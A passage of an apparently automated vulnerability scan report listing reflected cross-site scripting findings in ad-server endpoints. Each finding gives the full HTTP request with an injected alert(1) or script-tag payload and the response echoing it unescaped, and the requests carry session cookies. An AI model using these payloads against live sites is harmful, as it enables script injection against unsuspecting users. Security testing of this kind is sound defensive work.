5053814.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=&87aa4'-alert(1)-'e76ab0c0bb=1');
}
else
{
_strContentCP91288885053814 = '<a target="_blank" href="http://clk.atdmt.com/go/194067505/direct;wi.728;hi.90;ai.189501327;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/cl
...[SNIP]...

2.80. http://redcated/CNT/iview/194067505/direct [wi.728;hi.90/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/194067505/direct

Issue detail

The value of the wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ddb3'-alert(1)-'6d56a67623f was submitted in the wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/194067505/direct;wi.728;hi.90/01?click=http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=4ddb3'-alert(1)-'6d56a67623f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.smh.com.au/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7504
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:20 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
85053814.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=4ddb3'-alert(1)-'6d56a67623f');
}
else
{
_strContentCP91288885053814 = '<a target="_blank" href="http://clk.atdmt.com/go/194067505/direct;wi.728;hi.90;ai.189501327;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/clic
...[SNIP]...

2.81. http://redcated/CNT/iview/194067505/direct [wi.728;hi.90/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/194067505/direct

Issue detail

The value of the wi.728;hi.90/01?click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0d1"><script>alert(1)</script>6ca1a9341f9 was submitted in the wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/194067505/direct;wi.728;hi.90/01?click=http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=ad0d1"><script>alert(1)</script>6ca1a9341f9 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.smh.com.au/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7577
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:19 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
89501327;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=ad0d1"><script>alert(1)</script>6ca1a9341f9\')(new Image).src=\'http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=ad0d1">
...[SNIP]...

2.82. http://redcated/CNT/iview/194067505/direct [wi.728;hi.90/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/194067505/direct

Issue detail

The value of the wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25482"-alert(1)-"a2f10542111 was submitted in the wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/194067505/direct;wi.728;hi.90/01?click=http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=25482"-alert(1)-"a2f10542111 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.smh.com.au/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7502
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:20 GMT

<html><head><title>110710_22_UTV_THDVR_39_50B_TAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
85053814_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000782316/mnum=0000816040/cstr=1910489=_4ceaf857,7272683583,782316^816040^1183^0,1_/xsxdata=$xsxdata/bnum=1910489/optn=64?trg=25482"-alert(1)-"a2f10542111",
clickThruUrl: "http://clk.redcated/go/194067505/direct;wi.728;hi.90;ai.189501327;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id
...[SNIP]...

2.83. http://redcated/ER1/jview/257494277/direct/01 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/ER1/jview/257494277/direct/01

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86e91'%3bb9e69a21d0d was submitted in the REST URL parameter 4. This input was echoed as 86e91';b9e69a21d0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /ER1/jview/257494277/direct86e91'%3bb9e69a21d0d/01?click=http://r1.ace.advertising.com/click/site=0000782315/mnum=0000913100/cstr=66354319=_4ceaf856,6606281134,782315^913100^1183^0,1_/xsxdata=$xsxdata/bnum=66354319/optn=64?trg= HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6499
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:22 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

var nRequiredVersion = 9;
var bIsRightVersion = f
...[SNIP]...
<param name="movie" value="HTTP://ec.atdmt.com/ds/HHER1ADVACNU/BM_AOL/BM_fast_300x250_AOL.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/257494277/direct86e91';b9e69a21d0d;ai.182706457;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/257494277/direct86e91';b9e69a21d0d;ai.182706457;ct.1/01" />
...[SNIP]...

2.84. http://redcated/ER1/jview/257494277/direct/01 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/ER1/jview/257494277/direct/01

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbbb2"-alert(1)-"026ba92a597 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ER1/jview/257494277/direct/01?click=http://r1.ace.advertising.com/click/site=0000782315/mnum=0000913100/cstr=66354319=_4ceaf856,6606281134,782315^913100^1183^0,1_/xsxdata=$xsxdata/bnum=66354319/optn=64?trg=cbbb2"-alert(1)-"026ba92a597 HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6465
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:18 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

var nRequiredVersion = 9;
var bIsRightVersion = f
...[SNIP]...
7698_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000782315/mnum=0000913100/cstr=66354319=_4ceaf856,6606281134,782315^913100^1183^0,1_/xsxdata=$xsxdata/bnum=66354319/optn=64?trg=cbbb2"-alert(1)-"026ba92a597",
clickThruUrl: "http://clk.redcated/go/257494277/direct;ai.182706457;ct.$num$/01/",
imgs : []
};

if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

2.85. http://redcated/ER1/jview/257494277/direct/01 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/ER1/jview/257494277/direct/01

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1bf0'-alert(1)-'d5309825a0 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ER1/jview/257494277/direct/01?click=http://r1.ace.advertising.com/click/site=0000782315/mnum=0000913100/cstr=66354319=_4ceaf856,6606281134,782315^913100^1183^0,1_/xsxdata=$xsxdata/bnum=66354319/optn=64?trg=c1bf0'-alert(1)-'d5309825a0 HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6465
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:18 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

var nRequiredVersion = 9;
var bIsRightVersion = f
...[SNIP]...
587698.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000782315/mnum=0000913100/cstr=66354319=_4ceaf856,6606281134,782315^913100^1183^0,1_/xsxdata=$xsxdata/bnum=66354319/optn=64?trg=c1bf0'-alert(1)-'d5309825a0');

}
else
{
_strContentCNU1284470587698 = '<a target="_blank" href="http://clk.atdmt.com/go/257494277/direct;ai.182706457;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/site=
...[SNIP]...

2.86. http://redcated/ER1/jview/257494277/direct/01 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/ER1/jview/257494277/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9afa'-alert(1)-'6993c5a8e97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ER1/jview/257494277/direct/01?click=http://r1.ace.advertising.com/click/site=0000782315/mnum=0000913100/cstr=66354319=_4ceaf856,6606281134,782315^913100^1183^0,1_/xsxdata=$xsxdata/bnum=66354319/optn=64?trg=&e9afa'-alert(1)-'6993c5a8e97=1 HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6481
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:19 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

var nRequiredVersion = 9;
var bIsRightVersion = f
...[SNIP]...
87698.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000782315/mnum=0000913100/cstr=66354319=_4ceaf856,6606281134,782315^913100^1183^0,1_/xsxdata=$xsxdata/bnum=66354319/optn=64?trg=&e9afa'-alert(1)-'6993c5a8e97=1');

}
else
{
_strContentCNU1284470587698 = '<a target="_blank" href="http://clk.atdmt.com/go/257494277/direct;ai.182706457;ct.1/01/" onclick="if(\'http://r1.ace.advertising.com/click/sit
...[SNIP]...

2.87. http://redcated/ER1/jview/257494277/direct/01 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/ER1/jview/257494277/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f65d6"-alert(1)-"b35cd583ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ER1/jview/257494277/direct/01?click=http://r1.ace.advertising.com/click/site=0000782315/mnum=0000913100/cstr=66354319=_4ceaf856,6606281134,782315^913100^1183^0,1_/xsxdata=$xsxdata/bnum=66354319/optn=64?trg=&f65d6"-alert(1)-"b35cd583ee=1 HTTP/1.1
Accept: */*
Referer: http://www.smh.com.au/sport
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6477
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:10:19 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

var nRequiredVersion = 9;
var bIsRightVersion = f
...[SNIP]...
698_Instance =
{
click : "http://r1.ace.advertising.com/click/site=0000782315/mnum=0000913100/cstr=66354319=_4ceaf856,6606281134,782315^913100^1183^0,1_/xsxdata=$xsxdata/bnum=66354319/optn=64?trg=&f65d6"-alert(1)-"b35cd583ee=1",
clickThruUrl: "http://clk.redcated/go/257494277/direct;ai.182706457;ct.$num$/01/",
imgs : []
};

if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

2.88. http://redcated/M0N/iview/263234194/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/M0N/iview/263234194/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b603'%3baa6994b871b was submitted in the REST URL parameter 4. This input was echoed as 9b603';aa6994b871b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /M0N/iview/263234194/direct9b603'%3baa6994b871b;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B8f35a89e01980ba7%253B12c75daa6c4%2C0%253B%253B%253B1622944026%2CzjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxKbadSwBAAAAAAAAAGMwMGYwNGJjLWY2OGQtMTFkZi1hMjgxLTAwMzA0OGQ2ZDI3MAAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esmh%2Ecom%2Eau%252Fsport%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAESo4vCCy9z-uR-F6FO4LQKZvmdNl8QhAZmZmZmZmHUC.yqFFtnMJQAAAAAAAAB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE.IZP.NwzCf5LQArDVZApJaajWYhZ2wevCYX1AAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D852829365%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c00f04bc-f68d-11df-a281-003048d6d270
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 9886
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:12:18 GMT

<html><head><title>20100622_4G_EVO_Reaction_DV4_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/0SM0NSPRTSSC/2010/20100622_4G_EVO_Reaction_DV4_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/263234194/direct9b603';aa6994b871b;wi.728;hi.90;ai.185076102;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/263234194/direct9b603';aa6994b871b;wi.728;hi.90;ai.185076102;ct.1/01" />
...[SNIP]...

2.89. http://redcated/M0N/iview/263234194/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/M0N/iview/263234194/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41a75'-alert(1)-'8ae90ac6773 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /M0N/iview/263234194/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B8f35a89e01980ba7%253B12c75daa6c4%2C0%253B%253B%253B1622944026%2CzjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxKbadSwBAAAAAAAAAGMwMGYwNGJjLWY2OGQtMTFkZi1hMjgxLTAwMzA0OGQ2ZDI3MAAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esmh%2Ecom%2Eau%252Fsport%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D&41a75'-alert(1)-'8ae90ac6773=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.yieldmanager.com/iframe3?zjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAESo4vCCy9z-uR-F6FO4LQKZvmdNl8QhAZmZmZmZmHUC.yqFFtnMJQAAAAAAAAB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE.IZP.NwzCf5LQArDVZApJaajWYhZ2wevCYX1AAAAAA==,,http%3A%2F%2Fwww.smh.com.au%2Fsport,Z%3D728x90%26s%3D814544%26r%3D1%26_salt%3D852829365%26u%3Dhttp%253A%252F%252Fwww.smh.com.au%252Fsport,c00f04bc-f68d-11df-a281-003048d6d270
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 9887
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 22 Nov 2010 23:12:15 GMT

<html><head><title>20100604_4G_EVO_Devices_v3_DV4_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...
track_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D&41a75'-alert(1)-'8ae90ac6773=1');
}
else
{
_strContentSSC1285866172437 = '<a target="_blank" href="http://clk.atdmt.com/go/263234194/direct;wi.728;hi.90;ai.185123353;ct.1/01/" onclick="if(\'http%3A%2F%2Fad%2Eyieldmanager%2
...[SNIP]...

2.90. http://redcated/M0N/iview/263234194/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/M0N/iview/263234194/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fd6f"-alert(1)-"4c15efcb345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /M0N/iview/263234194/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B8f35a89e01980ba7%253B12c75daa6c4%2C0%253B%253B%253B1622944026%2CzjgAANBtDAA8N2oAAAAAACmvGwAAAAAAAgAAAAYAAAAAAP8AAAACEv9yGAAAAAAAlg8gAAAAAAA8ryQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAxKbadSwBAAAAAAAAAGMwMGYwNGJjLWY2OGQtMTFkZi1hMjgxLTAwMzA0OGQ2ZDI3MAAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esmh%2Ecom%2Eau%252Fsport%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1290467452814544-63144%26campID%3D42069%26crID%3D63144%26pubICode%3D2101142%26pub%3D256078%26partnerID%3D38%26url%3Dhttp%3A%2F%2Fwww%2Esmh%2Ecom%2Eau%2Fsport%26redirectURL%3D&4fd6f"-alert(1)-"4c15efcb345=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
